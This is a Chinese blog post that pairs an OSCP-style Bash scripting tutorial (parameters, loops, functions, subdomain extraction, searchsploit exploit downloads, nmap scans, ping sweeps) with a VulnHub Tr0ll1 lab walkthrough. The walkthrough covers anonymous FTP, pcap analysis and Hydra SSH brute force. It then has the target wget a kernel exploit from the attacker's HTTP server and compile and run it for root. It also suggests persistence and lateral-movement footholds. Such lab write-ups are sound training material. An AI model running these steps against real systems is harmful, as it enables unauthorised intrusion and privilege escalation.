2echo $user1 $user2

参数

1$0 脚本文件名自己
2$1-$9 bash脚本的前九个参数
3$# 传递给bash脚本的参数数量
4$@ 传递给bash 脚本的所有参数
5$? 最近运行的程序的退出状态
6$USER 运行脚本的用户的用户名
7$HOSTNAME 计算机的主机名
8$RANDOM 生成一个随机数
9$LINENO 脚本中的当前行号

新建一个脚本写入如下内容。

1#!/bin/bash
2echo "The first two arguments are $1 and $2"

 1#!/bin/bash
 2# 文件名: demo_script.sh
 3# 功能: 演示常用 Bash 参数的用法
 4
 5# 1. 打印脚本名称
 6echo "脚本名称: $0"
 7
 8# 2. 打印前三个参数（若未传递参数则显示空）
 9echo "第一个参数: ${1:-未提供}"
10echo "第二个参数: ${2:-未提供}"
11echo "第三个参数: ${3:-未提供}"
12
13# 3. 打印总参数个数
14echo "参数总数: $#"
15
16# 4. 打印所有参数（带循环）
17echo "所有参数:"
18count=1
19for arg in "$@"; do
20echo " 参数$count: $arg"
21((count++))
22done
23
24# 5. 测试上一个命令的退出状态
25echo "生成随机数（测试退出状态）:"
26echo "随机数: $RANDOM"
27echo "生成随机数的退出状态: $? (0表示成功)"
28
29# 6. 故意执行一个失败的命令
30echo "执行一个失败的命令:"
31ls /non_existent_file
32echo "失败命令的退出状态: $? (非0表示失败)"
33
34# 7. 用户和主机信息
35echo "当前用户: $USER"
36echo "主机名: $HOSTNAME"
37
38# 8. 显示脚本当前行号（动态变化）
39echo "当前行号（执行前）: $LINENO"
40echo "当前行号（执行后）: $LINENO"
41
42# 9. 结束提示
43echo "脚本结束于行号: $LINENO"

Bash 特殊变量

变量名	作用	示例代码	输出示例（假设场景）
`$0`	当前脚本文件名	`echo "脚本名: $0"`	`脚本名: ./test.sh`
`$1`-`$9`	脚本的第1到第9个参数	`echo "参数1: $1"`	若执行 `./test.sh hi` → `参数1: hi`
`$#`	传递给脚本的参数个数	`echo "参数总数: $#"`	若执行 `./test.sh a b` → `参数总数: 2`
`$@`	所有参数，每个参数独立（推荐使用）	`for arg in "$@"; do echo "$arg"; done`	循环打印每个参数
`$*`	所有参数，合并为一个字符串	`echo "所有参数: $*"`	`所有参数: a b c`
`$?`	上一个命令的退出状态（0为成功）	`ls /tmp; echo "状态: $?"`	`状态: 0`（若目录存在）
`$$`	当前 Shell 进程的 PID	`echo "PID: $$"`	`PID: 12345`
`$!`	最后一个后台进程的 PID	`sleep 10 &; echo "后台PID: $!"`	`后台PID: 6789`
`$_`	上一个命令的最后一个参数	`ls /var; echo "$_"`	`/var`（假设 `ls` 命令的参数是 `/var`）
`$RANDOM`	生成一个 0-32767 的随机数	`echo "随机数: $RANDOM"`	`随机数: 18492`
`$LINENO`	当前脚本中的行号	`echo "当前行: $LINENO"`	`当前行: 15`
`$FUNCNAME`	当前函数名（数组，`${FUNCNAME[0]}`为当前函数）	`function test_fn { echo "函数名: ${FUNCNAME[0]}"; }; test_fn`	`函数名: test_fn`
`$SECONDS`	脚本已运行的秒数	`echo "运行时间: $SECONDS秒"`	`运行时间: 5秒`
`$PWD`	当前工作目录路径	`echo "当前目录: $PWD"`	`当前目录: /home/user`
`$OLDPWD`	上一个工作目录路径（`cd -`切换时会更新）	`echo "上一个目录: $OLDPWD"`	`上一个目录: /tmp`
`$IFS`	输入字段分隔符（默认是空格、制表符、换行）	`IFS=:; echo "拆分: $*"`	若参数为 `a:b:c` → `拆分: a b c`
`$BASH_VERSION`	Bash 版本信息	`echo "Bash版本: $BASH_VERSION"`	`Bash版本: 5.1.16(1)-release`
`$PPID`	父进程的 PID	`echo "父进程PID: $PPID"`	`父进程PID: 1234`
`$BASH_SOURCE`	当前脚本的路径（数组，`${BASH_SOURCE[0]}`为当前脚本）	`echo "脚本路径: ${BASH_SOURCE[0]}"`	`脚本路径: ./test.sh`

常用环境变量

变量名	作用	示例代码	输出示例
`$USER`	当前用户名	`echo "用户: $USER"`	`用户: ubuntu`
`$HOME`	当前用户的主目录路径	`echo "主目录: $HOME"`	`主目录: /home/user`
`$PATH`	可执行文件的搜索路径	`echo "PATH: $PATH"`	`PATH: /usr/bin:/bin`
`$SHELL`	当前 Shell 的路径	`echo "Shell: $SHELL"`	`Shell: /bin/bash`
`$LANG`	系统语言设置	`echo "语言: $LANG"`	`语言: en_US.UTF-8`
`$TERM`	终端类型	`echo "终端类型: $TERM"`	`终端类型: xterm-256color`
`$EDITOR`	默认文本编辑器	`echo "编辑器: $EDITOR"`	`编辑器: vim`
`$UID`	当前用户的 UID	`echo "UID: $UID"`	`UID: 1000`
`$GROUPS`	当前用户所属的组（数组）	`echo "组: ${GROUPS[@]}"`	`组: 1000 4 24`
`$HOSTNAME`	系统主机名	`echo "主机名: $HOSTNAME"`	`主机名: myserver`
`$OSTYPE`	操作系统类型	`echo "系统类型: $OSTYPE"`	`系统类型: linux-gnu`

用户输入

1#!/bin/bash
2echo "Hello there, would you like to learn how to hack: Y/N?"
3read answer # 把用户输入存到answer变量中
4echo "Your answer was $answer"

1#!/bin/bash
2# Prompt the user for credentials
3# Penetration Testing with Kali Linux 2.0
4# PWK 2.0 Copyright © Offensive Security Ltd. All rights reserved. 110
5read -p 'Username: ' username # 输出提示的同时将用户输入存入username变量
6read -sp 'Password: ' password # 输出提示的同时将用户输入存入password变量，且不显示，用于密码
7echo " "
8echo "Thanks, your creds are as follows: " $username " and " $password

判断

Bash 条件测试操作符详解

逻辑操作符

操作符	描述	示例
`! EXPRESSION`	对表达式取反（非）	`if ! [ -e file ]` → 文件不存在时条件为真

字符串比较

操作符	描述	示例
`-n STRING`	字符串长度大于零（非空）	`if [ -n "$name" ]` → 检查变量 `name` 是否非空
`-z STRING`	字符串长度为零（空）	`if [ -z "$error" ]` → 检查变量 `error` 是否为空
`STRING1 = STRING2`	字符串相等	`if [ "$os" = "Linux" ]` → 判断系统是否为 Linux
`STRING1 != STRING2`	字符串不相等	`if [ "$input" != "exit" ]` → 输入不是 “exit” 时条件为真

整数比较

操作符	描述	示例
`INT1 -eq INT2`	等于（Equal）	`if [ "$a" -eq 5 ]` → 判断 `a` 是否等于 5
`INT1 -ne INT2`	不等于（Not Equal）	`if [ "$retry" -ne 0 ]` → 重试次数不为 0
`INT1 -gt INT2`	大于（Greater Than）	`if [ "$score" -gt 60 ]` → 分数超过 60
`INT1 -lt INT2`	小于（Less Than）	`if [ "$age" -lt 18 ]` → 年龄小于 18
`INT1 -ge INT2`	大于等于（Greater or Equal）	`if [ "$count" -ge 10 ]` → 计数达到或超过 10
`INT1 -le INT2`	小于等于（Less or Equal）	`if [ "$time" -le 30 ]` → 时间小于等于 30 秒

文件测试

操作符	描述	示例
`-d FILE`	文件存在且是目录	`if [ -d "/tmp" ]` → 检查 `/tmp` 是否是目录
`-e FILE`	文件存在	`if [ -e "log.txt" ]` → 检查 `log.txt` 是否存在
`-r FILE`	文件存在且有读权限	`if [ -r "config.cfg" ]` → 检查配置文件是否可读
`-s FILE`	文件存在且非空	`if [ -s "data.csv" ]` → 检查数据文件是否有内容
`-w FILE`	文件存在且有写权限	`if [ -w "output.log" ]` → 检查日志文件是否可写
`-x FILE`	文件存在且有执行权限	`if [ -x "install.sh" ]` → 检查安装脚本是否有执行权限

新建一个文件**number_game.sh**

 1#!/bin/bash
 2# 生成随机数，用户猜测数字比大小
 3
 4# 生成1-100的随机数
 5target=$((RANDOM % 100 + 1))
 6attempts=0
 7max_attempts=10
 8
 9echo "欢迎来到猜数字游戏！"
10echo "我已生成一个1到100之间的整数，你有${max_attempts}次机会猜中它。"
11
12while [ $attempts -lt $max_attempts ]; do
13((attempts++))
14remaining=$((max_attempts - attempts + 1))
15echo -n "第${attempts}次猜测（剩余${remaining}次）："
16
17read guess
18
19# 检查输入是否为空或非数字
20if [ -z "$guess" ]; then
21 echo "错误：输入不能为空！"
22 ((attempts--))
23 continue
24elif ! [[ "$guess" =~ ^[0-9]+$ ]]; then
25 echo "错误：请输入数字！"
26 ((attempts--))
27 continue
28fi
29
30# 比较数字
31if [ "$guess" -eq "$target" ]; then
32 echo "恭喜！你在第${attempts}次猜中了正确答案：${target}！"
33 exit 0
34elif [ "$guess" -lt "$target" ]; then
35 echo "提示：你猜的数字太小了！"
36else
37 echo "提示：你猜的数字太大了！"
38fi
39done
40
41echo "很遗憾，你已经用完所有次数。正确答案是：${target}。"
42exit 1

循环

1. `for` 循环

基本语法

1for 变量 in 列表; do
2循环体
3done

应用场景

遍历已知序列（数字、文件、字符串等）。
执行固定次数的重复操作。

示例 1：遍历数字序列

终端输入cat > for1.sh，复制粘贴如下内容，回车后按ctrl D结束输入。就能不用打开vim直接输入脚本了。

 1#!/bin/bash
 2# 遍历 1-5 并打印平方数
 3for i in 1 2 3 4 5; do
 4echo "$i 的平方是 $((i*i))"
 5done
 6
 7# 使用序列生成器 {起..止..步长}
 8for i in {1..5}; do
 9echo "数字: $i"
10done
11
12# 指定步长（仅 Bash 4+ 支持）
13for i in {0..10..2}; do
14echo "偶数: $i"
15done

输出示例

示例 2：遍历文件

 1#!/bin/bash
 2# 遍历当前目录所有 .txt 文件并输出文件名
 3for file in *.txt; do
 4echo "find_${file}"
 5done
 6
 7# 遍历带空格的文件名（需设置 IFS）
 8IFS=$'\n' # 将字段分隔符设为换行符
 9for file in $(find . -name "*.log"); do
10echo "处理文件: $file"
11done

示例 3：遍历数组

1#!/bin/bash
2fruits=("苹果" "香蕉" "橘子")
3for fruit in "${fruits[@]}"; do
4echo "水果: $fruit"
5done

输出示例

2. `while` 循环

基本语法

1while 条件; do
2循环体
3done

应用场景

条件持续满足时循环（如读取文件、等待任务完成）。
无限循环（需搭配 break 或外部终止条件）。

示例 1：条件控制循环

1#!/bin/bash
2# 计数器从1累加到5
3count=1
4while [ $count -le 5 ]; do
5echo "计数: $count"
6((count++))
7done

输出示例

示例 2：读取文件内容**

1#!/bin/bash
2# 逐行读取文件
3while IFS= read -r line; do
4echo "行内容: $line"
5done < "w2.txt"

示例 3：无限循环 + 用户输入退出

 1#!/bin/bash
 2# 持续询问用户输入，直到输入 "exit"
 3while true; do
 4read -p "请输入命令（输入 exit 退出）: " cmd
 5if [ "$cmd" = "exit" ]; then
 6 break
 7else
 8 echo "执行命令: $cmd" && echo $($cmd)
 9fi
10done

3. `until` 循环（补充）

与 while 逻辑相反，当条件为假时执行循环。

1#!/bin/bash
2# 直到计数器大于5时停止
3count=1
4until [ $count -gt 5 ]; do
5echo "计数: $count"
6((count++))
7done

循环控制语句

命令	作用	示例
`break`	立即终止循环	`if [ $i -eq 3 ]; then break; fi`
`continue`	跳过当前循环，进入下一次	`if [ $i -eq 2 ]; then continue; fi`

选择循环的建议

已知迭代次数/列表 → for 循环 （如处理文件、数组、数字序列）
依赖动态条件 → while 循环 （如读取输入、监控进程状态）

综合应用脚本

 1#!/bin/bash
 2# 功能: 查找并压缩所有 .log 文件，直到总压缩文件超过 3 个
 3
 4log_count=0
 5while [ $log_count -lt 3 ]; do
 6# 查找未压缩的 .log 文件
 7for file in *.log; do
 8 if [ -f "$file" ]; then
 9 gzip "$file"
10 echo "已压缩: $file"
11 ((log_count++))
12 # 达到3个后退出循环
13 if [ $log_count -ge 3 ]; then
14 break 2 # 跳出外层 while 循环
15 fi
16 fi
17done
18sleep 1 # 等待新日志生成
19done
20echo "已压缩满3个文件！"

通过灵活组合 for 和 while，可以高效处理文件操作、系统监控等任务。

函数

在 Bash 脚本中，函数（Function）用于封装可重复使用的代码块，提升代码的可读性和复用性。以下是 Bash 函数的详细用法及示例：

1. 定义函数

语法

1# 方式1：使用 function 关键字
2function 函数名 {
3函数体
4}
5
6# 方式2：直接定义（兼容性更好）
7函数名() {
8函数体
9}

示例 1：简单函数

1# 定义一个打印欢迎信息的函数
2welcome() {
3echo "欢迎使用本脚本！当前用户：$USER"
4}
5
6# 调用函数
7welcome

输出：

1欢迎使用本脚本！当前用户：ubuntu

2. 函数参数

函数通过位置参数（$1、$2…）接收参数，与脚本参数类似。

示例 2：带参数的函数

1# 定义一个加法计算器
2add() {
3local sum=$(( $1 + $2 )) # 使用 local 定义局部变量
4echo "$1 + $2 = $sum"
5}
6
7# 调用函数并传递参数
8add 5 3

输出：

15 + 3 = 8

3. 返回值

Bash 函数通过 return 返回 退出状态码（0 表示成功，非 0 表示错误），或通过 echo 输出结果。

示例 3：返回状态码

 1# 检查文件是否存在
 2file_exists() {
 3if [ -f "$1" ]; then
 4 return 0 # 文件存在，返回成功
 5else
 6 return 1 # 文件不存在，返回失败
 7fi
 8}
 9
10# 调用函数并检查返回值
11if file_exists "/etc/passwd"; then
12echo "文件存在！"
13else
14echo "文件不存在！"
15fi

示例 4：返回字符串

1# 生成问候语（通过 echo 返回结果）
2get_greeting() {
3local name=$1
4echo "你好，$name！今天是 $(date +%F)"
5}
6
7# 捕获函数输出
8message=$(get_greeting "大黑阔")
9echo "$message"

输出：

1你好，小明！今天是 2023-10-05

4. 局部变量

使用 local 关键字定义局部变量，避免污染全局作用域。

 1# 生成问候语（通过 echo 返回结果）
 2get_greeting() {
 3local name=$1
 4globalname=$2
 5echo "你好，$name！今天是 $(date +%F)"
 6}
 7
 8# 捕获函数输出
 9get_greeting "大黑阔" "Hacker"
10echo $name # 局部变量不可见
11echo $globalname

5. 高级用法

递归函数

 1# 计算阶乘（递归实现）
 2factorial() {
 3if [ $1 -le 1 ]; then
 4 echo 1
 5else
 6 local prev=$(factorial $(( $1 - 1 )) )
 7 echo $(( $1 * $prev ))
 8fi
 9}
10
11# 计算 5!
12result=$(factorial 5)
13echo "5! = $result" # 输出 "5! = 120"

函数库

将常用函数保存为独立文件（如 utils.sh），通过 source 导入：to_upper函数实现小写转大写。

1# utils.sh
2to_upper() {
3echo "$1" | tr '[:lower:]' '[:upper:]'
4}
5
6# main.sh
7#!/bin/bash
8source utils.sh
9echo $(to_upper "hello")

6. 注意事项

定义顺序：函数必须在调用之前定义。
命名冲突：避免函数名与系统命令或别名重复。
参数传递：参数通过空格分隔，若参数含空格需用引号包裹（如 func "参数 1"）。
返回值限制：return 只能返回 0-255 的整数，返回字符串或复杂数据需用 echo。

布尔逻辑运算

在 Bash 中，&&、||、& 和 | 是常用的操作符，用于控制命令的执行逻辑和流程。以下是它们的详细解释及示例：

1. `&&`（逻辑与）

作用：只有 前一个命令成功执行（退出状态码为 0），才会执行后面的命令。

1mkdir mydir && cd mydir # 先创建目录，若成功则进入该目录

如果 mkdir mydir 成功（目录创建成功），则执行 cd mydir。
如果 mkdir 失败（如目录已存在），则不会执行 cd。

2. `||`（逻辑或）

作用：只有 前一个命令执行失败（退出状态码非 0），才会执行后面的命令。

1ping -c1 google.com || echo "网络不可达" # 若 ping 失败，则提示错误

如果 ping 失败（网络断开），则执行 echo 输出提示。
如果 ping 成功，不执行 echo。

3. `&`（后台执行）

作用：将命令放入 后台执行，终端可继续输入其他命令。

1sleep 10 & # 后台休眠10秒，终端可继续操作

命令后加 & 会返回一个后台进程的 PID（如 [1] 12345）。
可通过 jobs 查看后台任务，fg %1 将任务调回前台。

4. `|`（管道）

作用：将 前一个命令的输出 作为 后一个命令的输入。

1cat log.txt | grep "error" | wc -l # 统计 log.txt 中 "error" 的行数

cat log.txt 输出文件内容。
grep "error" 过滤含 “error” 的行。
wc -l 统计行数。

组合使用示例

场景：下载文件，若失败则重试，成功后解压并删除原文件。

1wget http://example.com/file.tar.gz && \
2tar -xzf file.tar.gz || \
3echo "下载失败，请检查网络！"

wget 下载文件，若成功则执行 tar 解压。
若 wget 失败，直接执行 echo 提示错误。

符号优先级

默认优先级：&& 和 || 的优先级低于 | 和 &。
强制优先级：用 () 或 {}
分组：

1(cmd1 && cmd2) || cmd3 # 若 cmd1 和 cmd2 都成功则不执行 cmd3，否则执行

实操练习1-网页地址查找

1wget www.megacorpone.com
2ls -al index.html 
3grep "href=" index.html

1grep "href=" index.html | grep "\.megacorpone" | grep -v "www\.megacorpone\.com" | head
2grep "href=" index.html | grep "\.megacorpone" | grep -v "www\.megacorpone\.com" | awk -F "http://" '{print $2}'
3
4grep "href=" index.html # 1. 提取所有包含 href= 的 HTML 行
5| grep "\.megacorpone" # 2. 筛选含 .megacorpone 的行（子域名或路径）
6| grep -v "www\.megacorpone\.com" # 3. 排除含 www.megacorpone.com 的行
7| head # 4. 仅显示前 10 条结果

1grep "href=" index.html | grep "\.megacorpone" | grep -v "www\.megacorpone\.com" | awk -F "http://" '{print $2}' | cut -d "/" -f 1
2grep -o '[^/]*\.megacorpone\.com' index.html | sort -u > list.txt

命令 1：提取特定子域名并处理链接结构

分步解析

grep "href=" index.html
- 从 index.html 中提取所有包含 href= 的行（HTML 超链接标签）。
grep "\.megacorpone"
- 筛选包含 .megacorpone 的行（匹配子域名或路径中的该字段）。
grep -v "www\.megacorpone\.com"
- 排除包含 www.megacorpone.com 的行（主站域名）。
awk -F "http://" '{print $2}'
- 以 http:// 为分隔符，提取其后的内容（如 cdn.megacorpone.com/style.css）。
cut -d "/" -f 1
- 以 / 为分隔符，提取第一个字段（即域名部分，如 cdn.megacorpone.com）。

命令 2：直接匹配并收集所有子域名

分步解析

grep -o '[^/]\*\.megacorpone\.com'
- -o：仅输出匹配的部分。
- 正则
```
[^/]*\.megacorpone\.com
```
  - [^/]*：匹配不包含 / 的任意字符（避免包含路径或端口）。
  - \.megacorpone\.com：匹配以 .megacorpone.com 结尾的域名。
sort -u
- 对结果排序并去重（-u 表示唯一性）。
> list.txt
- 将结果保存到 list.txt 文件。

主机ip筛查

1for url in $(cat list.txt); do host $url; done
2for url in $(cat list.txt); do host $url; done | grep "has address" | cut -d " " -f 4 | sort -u

查找发现教材上的示例网页页面中的子域名，ip主要集中在加拿大（这里和教材示例不同，推测是因为使用了VPN的缘故，以及网页距离写教材时已经过去多年，更换过服务器）。

实操练习2-筛选漏洞脚本并下载

1searchsploit afd windows -w -t
2searchsploit afd windows -w -t | grep http | cut -f 2 -d "|"
3mkdir afd && cd afd
4for e in $(searchsploit afd windows -w -t | grep http | cut -f 2 -d "|"); do exp_name=$(echo $e | cut -d "/" -f 5) && url=$(echo $e | sed 's/exploits/raw/') && wget -q --no-check-certificate $url -O $exp_name; done

1file 17133
2cat 17133

实操练习3-Nmap扫描

1sudo nmap --script=vuln -p- -T4 -iL nmaphost.txt --min-rate 1000 --open
2sudo nmap -A -p80 --open 10.11.1.0/24 -oG nmap-scan_10.11.1.1-254
3cat nmap-scan_10.11.1.1-254 | grep 80 | grep -v "Nmap"
4cat nmap-scan_10.11.1.1-254 | grep 80 | grep -v "Nmap" | awk '{print $2}'
5for ip in $(cat nmap-scan_10.11.1.1-254 | grep 80 | grep -v "Nmap" | awk '{print $2}'); do cutycapt --url=$ip --out=$ip.png;done

课后练习

Research Bash loops and write a short script to perform a ping sweep of your target IP range of 10.11.1.0/24.
Try to do the above exercise with a higher-level scripting language such as Python, Perl, or Ruby.
Use the practical examples in this module to help you create a Bash script that extracts JavaScript files from the access_log.txt file (http://www.offensive-security.com/pwkfiles/access_log.txt.gz). Make sure the file names DO NOT include the path, are unique, and are sorted.
Re-write the previous exercise in another language such as Python, Perl, or Ruby.
研究 Bash 循环，编写一个简短的脚本，对目标 IP 范围 10.11.1.0/24 执行 Ping 扫描。
尝试用 Python 等高级语言实现上述功能。
使用本模块的实例，编写一个 Bash 脚本从 access_log.txt 中提取 JavaScript 文件名，要求文件名不包含路径、唯一且排序。
用 Python 等语言重写上述提取 JavaScript 文件名的功能。

1. Bash 脚本：Ping 扫描 `10.11.1.0/24` 网段

这里为了能有输出，改为172.168.169.0/24网段，时我本地虚拟机的内网

#!/bin/bash
# 遍历 1-254，发送 Ping 请求并输出存活主机
for ip in {1..254}; do
 target="172.168.169.$ip"
 # -c 1: 发送 1 个包，-W 1: 超时 1 秒
 ping -c 1 -W 1 $target > /dev/null 2>&1
 if [ $? -eq 0 ]; then
 echo "$target is up"
 fi
done

2. Python 脚本：Ping 扫描 `10.11.1.0/24` 网段

import os
import subprocess
from concurrent.futures import ThreadPoolExecutor

def ping_host(ip):
 target = f"172.168.169.{ip}"
 # 调用系统 Ping 命令（Windows 需将 '-c 1' 改为 '-n 1'）
 result = subprocess.run(['ping', '-c', '1', '-W', '1', target], 
 stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
 if result.returncode == 0:
 print(f"{target} is up")

# 使用多线程加速扫描（1-254）
with ThreadPoolExecutor(max_workers=50) as executor:
 executor.map(ping_host, range(1, 255))

3. Bash 脚本：从 `access_log.txt` 提取唯一 JS 文件名

wget --secure-protocol=TLSv1_2 https://www.offensive-security.com/pwk-files/access_log.txt.gz
gunzip access_log.txt.gz 


#!/bin/bash
# 提取所有 JS 文件，去重并排序
grep -oP 'GET \K[^ ]+?\.js' access_log.txt | awk -F/ '{print $NF}' | sort -u

说明：

grep -oP 'GET \K[^ ]+?\.js': 匹配 GET 请求中的 .js 文件路径，\K 丢弃 GET 前缀。
awk -F/ '{print $NF}': 以 / 分割路径，输出最后一个字段（文件名）。
sort -u: 排序并去重。

4. Python 脚本：提取唯一 JS 文件名

 1import re
 2from collections import defaultdict
 3
 4js_files = set()
 5
 6# 匹配 GET 请求中的 JS 文件
 7pattern = re.compile(r'GET\s+([^ ]+?\.js)')
 8
 9with open('access_log.txt', 'r') as f:
10 for line in f:
11 match = pattern.search(line)
12 if match:
13 path = match.group(1)
14 # 提取文件名（忽略路径）
15 filename = path.split('/')[-1]
16 js_files.add(filename)
17
18# 排序并输出
19for filename in sorted(js_files):
20 print(filename)

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day13 Tr0ll1 靶场WP

Fri, 16 May 2025 11:29:27 +0000

关注 泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

Tr0ll: 1

靶场地址：https://www.vulnhub.com/entry/tr0ll-1,100/

信息收集

1sudo arp-scan -l 
2nmap -sS -sV -A -T5 -p- 172.168.169.140

1| http-robots.txt: 1 disallowed entry 
2|_/secret

这个输出提示，有一个不让机器人爬虫爬取的目录secret，越不让看什么越要看，看了就一个图片，还不如不看。

1|_End of status
2| ftp-anon: Anonymous FTP login allowed (FTP code 230)
3|_-rwxrwxrwx 1 1000 0 8068 Aug 10 2014 lol.pcap [NSE: writeable]

这个输出提示，ftp有一个可以匿名访问的文件，lol.pcap

1ftp 172.168.169.140
2ftp> user anonymous
3ftp> ls
4ftp> get lol.pcap

抓包分析

用Day12 Kali渗透工具Powercat和Wireshark、tcpdump 介绍的工具打开流量包分析

1tshark -r lol.pcap -T fields -e ip.dst | sort | uniq -c | sort -nr | head
2sudo tcpdump -n -r lol.pcap| awk -F" " '{print $5}' | sort | uniq -c | head 
3sudo tcpdump -n -r lol.pcap| awk -F" " '{print $3}' | sort | uniq -c | head

可以看到21端口的请求数量较多，而且结合前面nmap的扫描结果来看，应该是有尝试多次登录ftp。所以就单独把21端口提出来看一下。

sudo tcpdump -n port 21 -r lol.pcap

然后发现了一个奇怪的txt文件。

1sudo tcpdump -n -X -v -r capture.pcap tcp # 筛选所有tcp的流量

单独把重要信息的端口的内容解析出来。

1tshark -r lol.pcap -Y "tcp.port == 51884" -T fields -e tcp.payload | xxd -r -p

网页目录信息收集

这里一开始的sup3rs3cr3tdirlol我没反应过来是什么，用AI翻译，AI自动识别位超级秘密目录，是把3看做e的做法，是英语中常见的作法。

下载后查看似乎是个二进制文件。

1wget http://172.168.169.140/sup3rs3cr3tdirlol/roflmao

提示找到0x0856BF地址继续，我们继续在网页中中找这个目录。

SSH密码爆破

找到似乎是用户名和密码的两个文件，推测是ssh密码，复制后用hydra爆破。

1hydra -L user.txt -P pass.txt 172.168.169.140 ssh -v
2wget http://172.168.169.140/0x0856BF/this_folder_contains_the_password/Pass.txt

这里作者开了个玩笑，密码不是Good_job_:)也不是Good_job_，而是文件名Pass.txt。所以用-p用一个密码字段爆破，即当前文件名，而不是-P指定密码文件爆破。

得到用户名overflow和密码Pass.txt，用ssh登录即可。

1ssh overflow@172.168.169.140

我们可以得到两个信息，一个是上一次登录是2014年从10.0.0.12登录的，所以这台靶机在流量包中的地址应该是10.0.0.6，第二个信息是，登陆后限时3分钟的操作。

内网信息收集和提权

好在只是限时3分钟，没有限制失败一次后不能在登陆。我们手速快一点是没问题的。首先收集以下内核信息。

1$ uname -a
2Linux troll 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
3$ lsb_release -a
4No LSB modules are available.
5Distributor ID: Ubuntu
6Description: Ubuntu 14.04.1 LTS
7Release: 14.04
8Codename: trusty

观察到Ubuntu版本比较老，所以可以尝试用老版本内核漏洞提权。

1searchsploit Ubuntu 14.04 3.13.0
2searchsploit -m linux/local/37292.c

下载后，传到靶机编译后执行即可，由于有时长限制，我们先把要用到的脚本准备好。攻击机kali开启http服务。

1python3 -m http.server

1cd /tmp
2wget http://172.168.169.128:8000/37292.c
3gcc -o exp 37292.c 
4./exp

刚好在断网前拿到权限。如果是在真实过程中，拿到root权限后可以想办法把这个3分钟限制关掉，或者简历新的不限时的新账户用于持续攻击和横向移动。

建立保活稳定持续的后门

1find / -name cronlog 2>/dev/null
2cat /var/log/cronlog
3find / -name cleaner.py 2>/dev/null
4cat /lib/log/cleaner.py

可以看到这里可以得知系统会每 2 分钟执行一次 cleaner.py 脚本。脚本内容就是清楚tmp目录下的东西。抓紧时间把这个删除的脚本改掉。

但是负责给我们断网的脚本应该还在别处。可以通过以下命令排查，先全部执行完，再一个个分析。

1echo $TMOUT
2cat /etc/ssh/sshd_config
3grep -Ri "pam_time.so" /etc/pam.d
4grep -Ri "timeout\|kill.*ssh" /etc/cron.*
5grep -Ri "clean" /etc/cron.*
6cat /etc/update-motd.d/*

echo $TMOUT没有输出，表示不是通过这个变量来限制时长的。

 1$ cat /etc/ssh/sshd_config
 2# Package generated configuration file
 3# See the sshd_config(5) manpage for details
 4
 5# What ports, IPs and protocols we listen for
 6Port 22
 7# Use these options to restrict which interfaces/protocols sshd will bind to
 8#ListenAddress ::
 9#ListenAddress 0.0.0.0
10Protocol 2
11# HostKeys for protocol version 2
12HostKey /etc/ssh/ssh_host_rsa_key
13HostKey /etc/ssh/ssh_host_dsa_key
14HostKey /etc/ssh/ssh_host_ecdsa_key
15HostKey /etc/ssh/ssh_host_ed25519_key
16#Privilege Separation is turned on for security
17UsePrivilegeSeparation yes
18
19# Lifetime and size of ephemeral version 1 server key
20KeyRegenerationInterval 3600
21ServerKeyBits 1024
22
23# Logging
24SyslogFacility AUTH
25LogLevel INFO
26
27# Authentication:
28LoginGraceTime 120
29PermitRootLogin without-password
30StrictModes yes
31
32RSAAuthentication yes
33PubkeyAuthentication yes
34#AuthorizedKeysFile %h/.ssh/authorized_keys
35
36# Don't read the user's ~/.rhosts and ~/.shosts files
37IgnoreRhosts yes
38# For this to work you will also need host keys in /etc/ssh_known_hosts
39RhostsRSAAuthentication no
40# similar for protocol version 2
41HostbasedAuthentication no
42# Uncomment if you don't trust ~/.ssh/known_hosts for RhostsRSAAuthentication
43#IgnoreUserKnownHosts yes
44
45# To enable empty passwords, change to yes (NOT RECOMMENDED)
46PermitEmptyPasswords no
47
48# Change to yes to enable challenge-response passwords (beware issues with
49# some PAM modules and threads)
50ChallengeResponseAuthentication no
51
52# Change to no to disable tunnelled clear text passwords
53#PasswordAuthentication yes
54
55# Kerberos options
56#KerberosAuthentication no
57#KerberosGetAFSToken no
58#KerberosOrLocalPasswd yes
59#KerberosTicketCleanup yes
60
61# GSSAPI options
62#GSSAPIAuthentication no
63#GSSAPICleanupCredentials yes
64
65X11Forwarding yes
66X11DisplayOffset 10
67PrintMotd no
68PrintLastLog yes
69TCPKeepAlive yes
70#UseLogin no
71
72#MaxStartups 10:30:60
73#Banner /etc/issue.net
74
75# Allow client to pass locale environment variables
76AcceptEnv LANG LC_*
77
78Subsystem sftp /usr/lib/openssh/sftp-server
79
80# Set this to 'yes' to enable PAM authentication, account processing,
81# and session processing. If this is enabled, PAM authentication will
82# be allowed through the ChallengeResponseAuthentication and
83# PasswordAuthentication. Depending on your PAM configuration,
84# PAM authentication via ChallengeResponseAuthentication may bypass
85# the setting of "PermitRootLogin without-password".
86# If you just want the PAM account and session checks to run without
87# PAM authentication, then enable this but set PasswordAuthentication
88# and ChallengeResponseAuthentication to 'no'.
89UsePAM yes

KeyRegenerationInterval 3600作用：SSHv1 服务器密钥的重新生成时间间隔（单位：秒）。默认每 3600 秒（1小时） 重新生成一次密钥。注意：SSHv1 已过时且不安全，建议禁用 SSHv1 协议（现代系统默认使用 SSHv2）。这个如果是之后用密钥连接服务器的话，要注释掉这一行。不然一个小时后就要重新用密钥再次注册。

1$ grep -Ri "pam_time.so" /etc/pam.d
2/etc/pam.d/su:# account requisite pam_time.so
3/etc/pam.d/login:# account requisite pam_time.so

虽然有这两个预留的，但是#表示这两行没有生效。

观察每次登录后被断开的时间发现，无论我们什么时候登录，断开时间总是恰好在5，10的倍数时候断开，所以猜测是crontab中运行的每5分钟一次的脚本。

1crontab -l 
2cat /opt/lmao.py

查看lmao.py发现就是这个脚本每5分钟把overflow的登录会话关闭掉。如果我们想要获得稳定的ssh会话，只要把pkil那一行删掉即可。

1# cat /opt/lmao.py
2#!/usr/bin/env python
3import os
4
5os.system('echo "TIMES UP LOL!"|wall')
6os.system('pkill -u overflow')
7sys.exit()

